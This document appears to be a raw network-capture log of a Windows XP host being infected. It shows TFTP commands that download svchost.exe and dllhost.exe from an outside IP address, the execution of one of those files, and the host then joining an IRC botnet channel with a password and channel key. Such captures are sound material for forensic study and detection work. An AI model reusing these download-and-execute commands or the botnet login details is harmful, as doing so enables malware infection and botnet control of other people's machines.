VICTIM:  	Microsoft Windows XP [Version 5.1.2600] 
VICTIM:  	(C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32> 
VICTIM:  	tftp -i 173.17.160.132 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	\000\004\000F 
VICTIM:  	\000\004\000G 
VICTIM:  	\000\004\000H 
VICTIM:  	\000\004\000I 
VICTIM:  	\000\004\000J 
VICTIM:  	\000\004\000K 
VICTIM:  	\000\004\000L 
VICTIM:  	\000\004\000M 
VICTIM:  	\000\004\000N 
VICTIM:  	\000\004\000O 
VICTIM:  	\000\004\000P 
VICTIM:  	\000\004\000Q 
VICTIM:  	\000\004\000R 
VICTIM:  	\000\004\000S 
VICTIM:  	\000\004\000T 
VICTIM:  	\000\004\000U 
VICTIM:  	\000\004\000V 
VICTIM:  	Transfer successful: 43520 bytes in 6 seconds, 7253 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 173.17.160.132 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	\000\004\000E 
VICTIM:  	\000\004\000F 
VICTIM:  	\000\004\000F 
VICTIM:  	\000\004\000G 
VICTIM:  	\000\004\000G 
VICTIM:  	\000\004\000H 
VICTIM:  	\000\004\000H 
VICTIM:  	\000\004\000I 
VICTIM:  	\000\004\000I 
VICTIM:  	\000\004\000J 
VICTIM:  	\000\004\000J 
VICTIM:  	\000\004\000K 
VICTIM:  	\000\004\000K 
VICTIM:  	\000\004\000L 
VICTIM:  	\000\004\000L 
VICTIM:  	\000\004\000M 
VICTIM:  	\000\004\000M 
VICTIM:  	\000\004\000N 
VICTIM:  	\000\004\000N 
VICTIM:  	\000\004\000O 
VICTIM:  	\000\004\000O 
VICTIM:  	\000\004\000P 
VICTIM:  	\000\004\000P 
VICTIM:  	\000\004\000Q 
VICTIM:  	\000\004\000Q 
VICTIM:  	\000\004\000R 
VICTIM:  	\000\004\000R 
VICTIM:  	\000\004\000S 
VICTIM:  	\000\004\000S 
VICTIM:  	\000\004\000T 
VICTIM:  	\000\004\000T 
VICTIM:  	\000\004\000U 
VICTIM:  	\000\004\000U 
VICTIM:  	\000\004\000V 
VICTIM:  	Transfer successful: 43520 bytes in 9 seconds, 4835 bytes/s 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	C:\\WINDOWS\\system32> 
VICTIM:  	PASS h4xg4ng 
ATTACKER:	:irc.foonet.com NOTICE AUTH :*** Looking up your hostname... 
VICTIM:  	NICK [00|USA|XP|003683]USER SP0-125 * 0 :SRI-S3S1K11CZE9 
ATTACKER:	:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
ATTACKER:	PING :C3987D15 
ATTACKER:	PONG C3987D15 
ATTACKER:	:irc.foonet.com 001 [00|USA|XP|003683] :Welcome to the ROXnet IRC Network [00|USA|XP|003683]!SP0-125@192.168.1.253:irc.foonet.com 002 [00|USA|XP|003683] :Your host is irc.foonet.com, running version Unreal3.2.9-rc1:irc.foonet.com 003 [00|USA|XP|003683] :This server was created Wed Dec 15 13:55:48 2010:irc.foonet.com 004 [00|USA|XP|003683] irc.foonet.com Unreal3.2.9-rc1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ:irc.foonet.com 005 [00|USA|XP|003683] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server:irc.foonet.com 005 [00|USA|XP|003683] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,qjncrR ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server:irc.foonet.com 005 [00|USA|XP|003683] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server 
VICTIM:  	MODE [00|USA|XP|003683]  
ATTACKER:	:irc.foonet.com 251 [00|USA|XP|003683] :There are 1 users and 1123 invisible on 1 servers:irc.foonet.com 252 [00|USA|XP|003683] 1 :operator(s) online:irc.foonet.com 253 [00|USA|XP|003683] 7 :unknown connection(s):irc.foonet.com 254 [00|USA|XP|003683] 35 :channels formed:irc.foonet.com 255 [00|USA|XP|003683] :I have 1124 clients and 0 servers:irc.foonet.com 265 [00|USA|XP|003683] :Current Local Users: 1124  Max: 3357:irc.foonet.com 266 [00|USA|XP|003683] :Current Global Users: 1124  Max: 2448:irc.foonet.com 372 [00|USA|XP|003683] :- This is the short MOTD. To view the complete MOTD type /motd:irc.foonet.com 372 [00|USA|XP|003683] :- :irc.foonet.com 376 [00|USA|XP|003683] :End of /MOTD command.:[00|USA|XP|003683] MODE [00|USA|XP|003683] :+iwx 
VICTIM:  	JOIN #gg h3ftyMODE [00|USA|XP|003683] JOIN #gg h3fty 
ATTACKER:	:irc.foonet.com 221 [00|USA|XP|003683] +iwx 
VICTIM:  	MODE [00|USA|XP|003683] JOIN #gg h3fty 
ATTACKER:	:[00|USA|XP|003683]!SP0-125@F35A8C53.98E87026.2C6DB950.IP JOIN :#gg:irc.foonet.com 353 [00|USA|XP|003683] @ #gg :[00|USA|XP|003683] @[00|USA|XP|512399] :irc.foonet.com 366 [00|USA|XP|003683] #gg :End of /NAMES list.:irc.foonet.com 221 [00|USA|XP|003683] +iwx:irc.foonet.com 221 [00|USA|XP|003683] +iwx 
VICTIM:  	MODE #gg  
ATTACKER:	:irc.foonet.com 324 [00|USA|XP|003683] #gg +smntMu :irc.foonet.com 329 [00|USA|XP|003683] #gg 1306120703 
ATTACKER:	PING :irc.foonet.com 
ATTACKER:	PONG irc.foonet.com 
ATTACKER:	PING :irc.foonet.com 
ATTACKER:	PONG irc.foonet.com 
ATTACKER:	PING :irc.foonet.com 
ATTACKER:	PONG irc.foonet.com 
ATTACKER:	PING :irc.foonet.com 
ATTACKER:	PONG irc.foonet.com 
ATTACKER:	PING :irc.foonet.com 
ATTACKER:	PONG irc.foonet.com